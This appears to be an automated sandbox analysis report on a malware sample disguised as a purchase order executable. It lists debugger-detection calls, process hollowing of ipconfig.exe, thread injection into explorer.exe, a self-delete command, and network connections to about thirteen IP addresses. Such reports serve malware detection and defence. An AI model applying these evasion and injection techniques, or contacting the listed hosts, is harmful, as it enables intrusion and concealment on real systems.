Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E81B8F mov eax, dword ptr fs:[00000030h]	5_2_02E81B8F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E81B8F mov eax, dword ptr fs:[00000030h]	5_2_02E81B8F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F2D380 mov ecx, dword ptr fs:[00000030h]	5_2_02F2D380
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F3138A mov eax, dword ptr fs:[00000030h]	5_2_02F3138A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAB390 mov eax, dword ptr fs:[00000030h]	5_2_02EAB390
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA2397 mov eax, dword ptr fs:[00000030h]	5_2_02EA2397
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7DB60 mov ecx, dword ptr fs:[00000030h]	5_2_02E7DB60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA3B7A mov eax, dword ptr fs:[00000030h]	5_2_02EA3B7A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA3B7A mov eax, dword ptr fs:[00000030h]	5_2_02EA3B7A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7DB40 mov eax, dword ptr fs:[00000030h]	5_2_02E7DB40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F48B58 mov eax, dword ptr fs:[00000030h]	5_2_02F48B58
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7F358 mov eax, dword ptr fs:[00000030h]	5_2_02E7F358
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F3131B mov eax, dword ptr fs:[00000030h]	5_2_02F3131B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E740E1 mov eax, dword ptr fs:[00000030h]	5_2_02E740E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E740E1 mov eax, dword ptr fs:[00000030h]	5_2_02E740E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E740E1 mov eax, dword ptr fs:[00000030h]	5_2_02E740E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E758EC mov eax, dword ptr fs:[00000030h]	5_2_02E758EC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h]	5_2_02F0B8D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F0B8D0 mov ecx, dword ptr fs:[00000030h]	5_2_02F0B8D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h]	5_2_02F0B8D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h]	5_2_02F0B8D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h]	5_2_02F0B8D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h]	5_2_02F0B8D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB90AF mov eax, dword ptr fs:[00000030h]	5_2_02EB90AF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]	5_2_02EA20A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]	5_2_02EA20A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]	5_2_02EA20A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]	5_2_02EA20A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]	5_2_02EA20A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]	5_2_02EA20A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAF0BF mov ecx, dword ptr fs:[00000030h]	5_2_02EAF0BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAF0BF mov eax, dword ptr fs:[00000030h]	5_2_02EAF0BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAF0BF mov eax, dword ptr fs:[00000030h]	5_2_02EAF0BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E79080 mov eax, dword ptr fs:[00000030h]	5_2_02E79080
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF3884 mov eax, dword ptr fs:[00000030h]	5_2_02EF3884
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF3884 mov eax, dword ptr fs:[00000030h]	5_2_02EF3884
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F32073 mov eax, dword ptr fs:[00000030h]	5_2_02F32073
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F41074 mov eax, dword ptr fs:[00000030h]	5_2_02F41074
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E90050 mov eax, dword ptr fs:[00000030h]	5_2_02E90050
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E90050 mov eax, dword ptr fs:[00000030h]	5_2_02E90050
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h]	5_2_02E8B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h]	5_2_02E8B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h]	5_2_02E8B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h]	5_2_02E8B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h]	5_2_02EA002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h]	5_2_02EA002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h]	5_2_02EA002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h]	5_2_02EA002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h]	5_2_02EA002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F44015 mov eax, dword ptr fs:[00000030h]	5_2_02F44015
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F44015 mov eax, dword ptr fs:[00000030h]	5_2_02F44015
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF7016 mov eax, dword ptr fs:[00000030h]	5_2_02EF7016
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF7016 mov eax, dword ptr fs:[00000030h]	5_2_02EF7016
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF7016 mov eax, dword ptr fs:[00000030h]	5_2_02EF7016
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7B1E1 mov eax, dword ptr fs:[00000030h]	5_2_02E7B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7B1E1 mov eax, dword ptr fs:[00000030h]	5_2_02E7B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7B1E1 mov eax, dword ptr fs:[00000030h]	5_2_02E7B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F041E8 mov eax, dword ptr fs:[00000030h]	5_2_02F041E8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF69A6 mov eax, dword ptr fs:[00000030h]	5_2_02EF69A6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA61A0 mov eax, dword ptr fs:[00000030h]	5_2_02EA61A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA61A0 mov eax, dword ptr fs:[00000030h]	5_2_02EA61A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h]	5_2_02EF51BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h]	5_2_02EF51BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h]	5_2_02EF51BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h]	5_2_02EF51BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h]	5_2_02F349A4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h]	5_2_02F349A4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h]	5_2_02F349A4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h]	5_2_02F349A4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9C182 mov eax, dword ptr fs:[00000030h]	5_2_02E9C182
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAA185 mov eax, dword ptr fs:[00000030h]	5_2_02EAA185
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA2990 mov eax, dword ptr fs:[00000030h]	5_2_02EA2990
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7C962 mov eax, dword ptr fs:[00000030h]	5_2_02E7C962
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7B171 mov eax, dword ptr fs:[00000030h]	5_2_02E7B171
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7B171 mov eax, dword ptr fs:[00000030h]	5_2_02E7B171
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9B944 mov eax, dword ptr fs:[00000030h]	5_2_02E9B944
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9B944 mov eax, dword ptr fs:[00000030h]	5_2_02E9B944
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h]	5_2_02E94120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h]	5_2_02E94120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h]	5_2_02E94120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h]	5_2_02E94120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E94120 mov ecx, dword ptr fs:[00000030h]	5_2_02E94120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA513A mov eax, dword ptr fs:[00000030h]	5_2_02EA513A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA513A mov eax, dword ptr fs:[00000030h]	5_2_02EA513A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E79100 mov eax, dword ptr fs:[00000030h]	5_2_02E79100
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E79100 mov eax, dword ptr fs:[00000030h]	5_2_02E79100
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E79100 mov eax, dword ptr fs:[00000030h]	5_2_02E79100
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA16E0 mov ecx, dword ptr fs:[00000030h]	5_2_02EA16E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E876E2 mov eax, dword ptr fs:[00000030h]	5_2_02E876E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F48ED6 mov eax, dword ptr fs:[00000030h]	5_2_02F48ED6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA36CC mov eax, dword ptr fs:[00000030h]	5_2_02EA36CC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB8EC7 mov eax, dword ptr fs:[00000030h]	5_2_02EB8EC7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F2FEC0 mov eax, dword ptr fs:[00000030h]	5_2_02F2FEC0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF46A7 mov eax, dword ptr fs:[00000030h]	5_2_02EF46A7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F40EA5 mov eax, dword ptr fs:[00000030h]	5_2_02F40EA5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F40EA5 mov eax, dword ptr fs:[00000030h]	5_2_02F40EA5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F40EA5 mov eax, dword ptr fs:[00000030h]	5_2_02F40EA5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F0FE87 mov eax, dword ptr fs:[00000030h]	5_2_02F0FE87
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E8766D mov eax, dword ptr fs:[00000030h]	5_2_02E8766D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h]	5_2_02E9AE73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h]	5_2_02E9AE73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h]	5_2_02E9AE73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h]	5_2_02E9AE73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h]	5_2_02E9AE73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]	5_2_02E87E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]	5_2_02E87E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]	5_2_02E87E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]	5_2_02E87E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]	5_2_02E87E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]	5_2_02E87E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F3AE44 mov eax, dword ptr fs:[00000030h]	5_2_02F3AE44
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F3AE44 mov eax, dword ptr fs:[00000030h]	5_2_02F3AE44
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7E620 mov eax, dword ptr fs:[00000030h]	5_2_02E7E620
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F2FE3F mov eax, dword ptr fs:[00000030h]	5_2_02F2FE3F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7C600 mov eax, dword ptr fs:[00000030h]	5_2_02E7C600
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7C600 mov eax, dword ptr fs:[00000030h]	5_2_02E7C600
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7C600 mov eax, dword ptr fs:[00000030h]	5_2_02E7C600
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA8E00 mov eax, dword ptr fs:[00000030h]	5_2_02EA8E00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAA61C mov eax, dword ptr fs:[00000030h]	5_2_02EAA61C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAA61C mov eax, dword ptr fs:[00000030h]	5_2_02EAA61C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F31608 mov eax, dword ptr fs:[00000030h]	5_2_02F31608
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB37F5 mov eax, dword ptr fs:[00000030h]	5_2_02EB37F5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF7794 mov eax, dword ptr fs:[00000030h]	5_2_02EF7794
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF7794 mov eax, dword ptr fs:[00000030h]	5_2_02EF7794
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF7794 mov eax, dword ptr fs:[00000030h]	5_2_02EF7794
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E88794 mov eax, dword ptr fs:[00000030h]	5_2_02E88794
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E8FF60 mov eax, dword ptr fs:[00000030h]	5_2_02E8FF60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F48F6A mov eax, dword ptr fs:[00000030h]	5_2_02F48F6A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E8EF40 mov eax, dword ptr fs:[00000030h]	5_2_02E8EF40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E74F2E mov eax, dword ptr fs:[00000030h]	5_2_02E74F2E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E74F2E mov eax, dword ptr fs:[00000030h]	5_2_02E74F2E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAE730 mov eax, dword ptr fs:[00000030h]	5_2_02EAE730
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F0FF10 mov eax, dword ptr fs:[00000030h]	5_2_02F0FF10
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F0FF10 mov eax, dword ptr fs:[00000030h]	5_2_02F0FF10
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAA70E mov eax, dword ptr fs:[00000030h]	5_2_02EAA70E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAA70E mov eax, dword ptr fs:[00000030h]	5_2_02EAA70E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F4070D mov eax, dword ptr fs:[00000030h]	5_2_02F4070D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F4070D mov eax, dword ptr fs:[00000030h]	5_2_02F4070D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9F716 mov eax, dword ptr fs:[00000030h]	5_2_02E9F716
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F314FB mov eax, dword ptr fs:[00000030h]	5_2_02F314FB
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF6CF0 mov eax, dword ptr fs:[00000030h]	5_2_02EF6CF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF6CF0 mov eax, dword ptr fs:[00000030h]	5_2_02EF6CF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF6CF0 mov eax, dword ptr fs:[00000030h]	5_2_02EF6CF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F48CD6 mov eax, dword ptr fs:[00000030h]	5_2_02F48CD6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E8849B mov eax, dword ptr fs:[00000030h]	5_2_02E8849B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9746D mov eax, dword ptr fs:[00000030h]	5_2_02E9746D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F0C450 mov eax, dword ptr fs:[00000030h]	5_2_02F0C450
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F0C450 mov eax, dword ptr fs:[00000030h]	5_2_02F0C450
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAA44B mov eax, dword ptr fs:[00000030h]	5_2_02EAA44B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EABC2C mov eax, dword ptr fs:[00000030h]	5_2_02EABC2C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF6C0A mov eax, dword ptr fs:[00000030h]	5_2_02EF6C0A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF6C0A mov eax, dword ptr fs:[00000030h]	5_2_02EF6C0A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF6C0A mov eax, dword ptr fs:[00000030h]	5_2_02EF6C0A

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

Code function: 0_2_013ED6DE __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_013ED6DE

Enables debug privileges

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013E605C SetUnhandledExceptionFilter,	0_2_013E605C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013E032D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_013E032D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_013DD3A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_013DD3A1

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 52.58.78.16 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 194.35.122.226 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.201.11.126 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.134.22.63 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 160.153.136.3 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.224.182.242 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.253.79.71 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 52.71.133.130 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.12.202.18 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.246.6.109 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.86.218.70 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 13.226.173.80 80	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Section loaded: unknown target: C:\Users\user\Desktop\Purchase Order 40,7045$.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Thread register set: target process: 3292			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Thread register set: target process: 3292			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 140000

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exe			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'			Jump to behavior

Source: explorer.exe, 00000002.00000000.242800497.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmp	Binary or memory string: uProgram Manager
Source: explorer.exe, 00000002.00000000.254074114.0000000005F40000.00000004.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.242800497.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000002.501463213.0000000000EB8000.00000004.00000020.sdmp	Binary or memory string: ProgmanX
Source: explorer.exe, 00000002.00000000.242800497.0000000001400000.00000002.00000001.sdmp, ipconfig.exe, 00000005.00000002.505838974.0000000004340000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndAj

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: GetLocaleInfoA,	0_2_013EC95A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_013E81CA
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	0_2_013E883F
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_013E8B37
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_013EC321
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	0_2_013E8B73
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	0_2_013E8A10
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	0_2_013E5A51
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	0_2_013EC247
